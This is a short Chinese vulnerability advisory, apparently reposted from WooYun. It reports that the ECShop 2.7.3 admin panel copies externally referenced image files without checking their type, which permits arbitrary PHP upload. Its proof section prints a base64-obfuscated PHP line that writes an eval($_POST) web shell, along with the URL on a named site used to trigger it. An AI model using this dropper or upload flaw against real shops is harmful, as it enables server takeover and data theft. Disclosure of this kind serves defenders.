ecshop 2.7.3 后台过滤不严可获取shell
发布时间:2014-02-24 09:56文章来源:wooyun文章作者:Fixw 点击次数:
次
摘要:漏洞作者: Fixw 提交时间: 2013-11-25 13:47 公开时间: 2014-02-23 13:48 漏洞类型: 文件上传导致任意代码执行 简要描述: ecshop后台过滤不严可以上传php文件。。。。 详细说明: 问题出现在后台引用外部url图片时没有过滤文件格式,在/admin/goods.php...
漏洞作者: Fixw
提交时间: 2013-11-25 13:47
公开时间: 2014-02-23 13:48
漏洞类型: 文件上传导致任意代码执行
简要描述:
ecshop后台过滤不严可以上传php文件。。。。
详细说明:
问题出现在后台引用外部url图片时没有过滤文件格式,在/admin/goods.php第638行 ,
直接复制文件到temp文件夹下并且保留了原文件名,导致漏洞产生。
漏洞证明:
证明如下:
web1站点1.php文件内容
<?php fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbY10pPz4)); ?>
访问 http://www.yunsec.net/temp/1.php 后即可生成shell
标签分类:
下一篇:ThinkSNS 文件包含getshell一枚
相关阅读